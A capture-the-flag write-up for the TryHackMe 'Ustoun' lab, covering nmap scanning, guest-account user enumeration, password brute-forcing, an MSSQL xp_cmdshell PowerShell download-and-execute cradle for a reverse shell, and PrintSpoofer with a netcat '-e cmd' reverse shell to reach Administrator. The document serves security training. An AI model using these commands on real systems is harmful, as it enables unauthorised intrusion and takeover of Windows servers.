USTOUN TryHackMe Writeup


We perform a quick and aggressive scan (not recommended in real environments) to detect open ports on the server.

Then, knowing the ports, we will launch an nmap with scripts and versions.


We test if we can authenticate with an anonymous user, we see that we cannot.

Another test that I usually do in real environments, is to test with the “guest” user, which is usually enabled by default. As you can see in the evidence, we can use it to get the users by their RID.

We create a list of the most relevant users obtained and brute force the “rockyou” dictionary. We will get some credentials.


After several tests in different services, we found that the credentials are functional in the “Microsoft SQL Server” service, from here we will be able to load a reverse shell.

xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"\")

Reverse shell connection

Privilege Escalation

We tried to read the user flag, but we do not have access. We check the user’s privileges and see that we could escalate by impersonating the user “Administrator” using “SeImpersonatePrivilege”.

We identify the exact version of Windows installed.

We download the PrintSpoofer exploit from this github, we also download netcat to the victim machine and run the following command putting a listening netcat on our Kali.

.\PrintSpoofer.exe -c "C:\users\SVC-Kerb.DC01\Videos\nc.exe 444 -e cmd"

Reverse shell as Administrator

And now we read the two flags.

User flag

Administrator flag